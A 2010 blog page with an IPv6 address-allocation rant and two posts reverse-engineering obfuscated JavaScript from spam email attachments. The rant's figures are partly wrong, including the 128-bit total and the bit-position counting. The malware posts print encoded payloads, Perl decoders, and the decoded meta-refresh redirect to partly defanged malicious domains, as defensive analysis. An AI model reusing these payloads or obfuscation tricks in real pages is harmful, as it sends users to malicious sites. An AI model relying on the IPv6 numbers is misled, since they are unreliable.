## Monday, September 27, 2010

### Teh maths is fun... (ipv6 rant)

My company just got it's ipv6 allocation.  They gave us a /32.  Let's walk through this math for those of you watching from home.

/32 is the number of bits.  The full length of an ipv6 address is 128 bits.  Represented in binary, this means that the highest possible number is all 1's, for a total of 128 of them:

11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

To convert this number into decimal, you start way over at the right, and continuously increment by the powers of 2.  The first position is 1, the second is 2, the third is four, the fifth is 8, the sixth is 16, the seventh is 32, and so on and so forth.  If you bother to follow those powers of two all the way out to 128 bits, you end up with a really big number.  170,141,183,460,469,000,000,000,000,000,000,000,000 to be exact.  This is the maximum number of ip addresses able to be assigned out of the ipv6 pool.

Our allocation of a /32 means that, starting from the left, you count out 32 binary bit positions and flip them to a 1, and the remaining 96 binary positions are all 0.  This gives us a total allocation of 79,228,162,514,264,300,000,000,000,000 ip address.  If you were to write me a check giving me a dollar for every one of our ip addresses, you'd need a check that was about 3 feet wide so that you could write out the number in english.  You'd be writing me a check for seventy-nine octillion, two hundred twenty-eight septillion, one hundred sixty-two sextillion, five hundred fourteen quintillion, two hundred sixty-four quadrillion, three hundred trillion dollars.

So, my company has personally been given enough ipv6 addresses to assign every single cell in your body well over 1 quadrillion ip addresses.  Every. Single. Cell.

From what I've been hearing, this is the norm.  They gave one guy a /48 for his websites, of which he has a small handful.  One septillion ip addresses.  For a few websites.

Let's extrapolate that our /32 is the norm for anyone needing more than a handful of ip addresses.  Divide the biggest possible 128 bit number by our /32 allocation.

170,141,183,460,469,000,000,000,000,000,000,000,000
÷ 79,228,162,514,264,300,000,000,000,000

2,147,483,648

That's the kind of number you don't need any help spelling out.  A little better than 2 billion.  How many ipv4 addresses are there?  Double that.  4 billion, though the way ipv4 has been carved up means that substantially less than that is usable.

It took us 30 years to approach exhaustion of the ipv4 space, though the last 15 years has seen such an exponential increase, the first 15 years is nothing but a drop in a bit-bucket in comparison.

I've argued repeatedly that there's so much ipv4 space that is absolutely WASTED that there really isn't that much of a crunch if they started enforcing utilization standards.  MIT, for example, has 16 million public ipv4 addresses of their very own.  Why?  Because, when it was allocated to them so many years ago, they could get away with it.  16 million.  For a college.  Do they need 16 million publicly facing ip addresses?  NO.

And, of course, there's no place like 127.0.0.1 is there?  Another 16 MILLION ip addresses wasted on localhost.  Why?  Because back when it was assigned, they could.  Who cares, right?  When there's 4 billion addresses, what's 16 million here or there, just between friends?

Xerox, 16 million.  HP, 16 million.  Ford, 16 million.  Halliburton, 16 million.  Prudential, 16 million.  Merck, 16 million.

Do any of these companies need 16 million publicly facing ipv4 addresses?   NO.  That's over 83 million ip addresses wasted right there.  Yes, HP recently purchased a company that produced cell phones.  Do those cell phones need PUBLIC ipv4 addresses?  NO.  The specifics of the wastefulness of the ipv4 space are a separate rant, though.

My point is that this pattern of wastefulness is not only continuing with ipv6, it's getting much, much WORSE.  Insanely sized allocations to anyone who asks for a few ips?  Really?  What good is having this seemingly vast amount of address space, if (going back to the handful of websites example) the wastefulness of this space increases by not 1 or 2 or 10, but TWENTY-FIVE orders of magnitude?

The view from this boat looks a lot like it did 30 years ago.

## Friday, September 24, 2010

### More weaponized javascript email attachments reverse engineered...

My reverse engineering of the latest rash of spam attachment scripts:

```use strict;
use warnings;

use URI::Escape;

my \$js =  '%66%75%6E%63%74%69%6F%6E%20%65%5F%65%28%65%29%7B%65%3D%75%6E%65%73%63%61%70%65%28%65%29%3B%70%3D%22%54%4F%45%4D%50%4A%5A%4D%4C%4B%50%51%42%4E%42%22%3B%73%3D%22%22%3B%73%6C%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%6B%3D%30%2C%6A%3D%30%3B%66%6F%72%28%69%3D%30%3B%69%3C%65%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%63%3D%65%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%3B%69%66%28%63%3C%31%32%38%29%7B%63%3D%63%5E%70%2E%63%68%61%72%43%6F%64%65%41%74%28%6A%25%70%2E%6C%65%6E%67%74%68%29%3B%6A%2B%2B%3B%7D%73%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%3B%69%66%28%73%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%73%6C%5B%6B%2B%2B%5D%3D%73%3B%73%3D%22%22%7D%7D%73%3D%73%6C%2E%6A%6F%69%6E%28%22%22%29%2B%73%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73%29%7D';

print uri_unescape( \$js );
print "\n";

# the \$js string is a function named e_e:
#    function e_e(e){e=unescape(e);p="TOEMPJZMLKPQBNB";
#    s="";sl=new Array(),k=0,j=0;for(i=0;i80){sl[k++]=s;s=""}}s=sl.join("")+s;document.write(s)}

#
sub e_e {

my \$string = shift;
my \$e = uri_unescape(\$string);

my \$p = "TOEMPJZMLKPQBNB";

my \$s = "";

my @sl;
my \$k = 0;
my \$j = 0;

my @split = split( //, \$e );
my @psplit = split( //, \$p );

for( my \$i = 0; \$i < length( \$e ); \$i++ ){

my \$c = ord(\$split[\$i]);

if ( \$c < 128 ) {
my \$result = \$psplit[\$j % length(\$p)];
\$c = \$c ^ ord( \$result );
\$j++;
}

\$s .= chr(\$c);

if( length(\$s) > 80 ) {
\$sl[\$k++] = \$s;
\$s = "";
}
}

#s = sl.join("")+s;
\$s .= join( '', @sl );

print \$s;
print "\n";

}

#This string is passed to the e_e:
e_e('ts%28%28%24%2Bz%258? |%27?7%3D9xo%22%2F%3C?%2988sb%2D%2D%3A%3B #%24wx%7Dw%3E%22%3D%7F&6 ?%7Fb%7F%3E2%28*9?%3C#%27%2C1%3Dk%2E?%27u|b#%24%3C%2Elb%7Bqem%5D@WGp?13%2E%2Bb#&!98wx||%7Busb%2C%2D&%2B ?mhjorw%24#b%2C%257 %29%22%22wxny~fgzv%60t%2E%29%247%24go%2F%2E%3E%25%27%3C%60js1%29nv%3Bm%24957%7Fl* %3B5w%7Fe%2D%3A%3Be %24%2E%221%3B%291c3%257b%24?%3D%3D2!51%3Dk%25%24%27xsp%2D??6n%245%2C pr^K%28%24%2D%27|q%0A%2B%2E%22*1%243%2Bvm?*%3E%22o%3D%27&&#op%295!#9msa^H^D^R                                                        ^C^Krj%29%246%2Emso%7F%60j^[%2D%24#j%0D%28%2Ek0%25%2Bb#%2E6m 859%29%28%244&n %2Do%0D^Y^]^F%0A%22%3B%2E%22%7Dbn^A8&&&p%22??%29k%24%3Eb^\%273&6958fb*                        %24%3E%25|rm5qyb%24%2Edqc?%22o~a65%2D%29%28nGP');

# produces a metarefresh to http://XXXXthefromainerXXXX.com

```

## Tuesday, September 21, 2010

### Don't open any unfamiliar attachments today!

The mail servers here started getting inundated with some weaponized email spam about invoice attachments.

The decoded contents of this spam contains the following javascript:

var s="ifmmp!csjbo!=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00uvsltbhmjltfo/psh/us0y/iunm#!0?!czf!csjbo";

m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){  m+= '&';} else if (s.charCodeAt(i) == 23) {  m+= '!';} else {  m+=String.fromCharCode(s.charCodeAt(i)-1); }}document.write(m);

When I reverse engineered it in perl it produces the following result:

#!/usr/bin/perl

my \$s = 'ifmmp!csjbo!=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00uvsltbhmjltfo/psh/us0y/iunm#!0?!czf!csjbo';

push @new, chr( ord( \$_ ) - 1 ) for split( //, \$s );

print join( '', @new ) . "\n";

OUTPUT:

hello brian <meta http-equiv="refresh" content="0;url=http://XXXXturksagliksenXXXX.org.tr/x.html" /> bye brian

I rigged up our name servers so that when one of our customers tries to hit that domain, it just redirects to a web page indicating that it was blocked.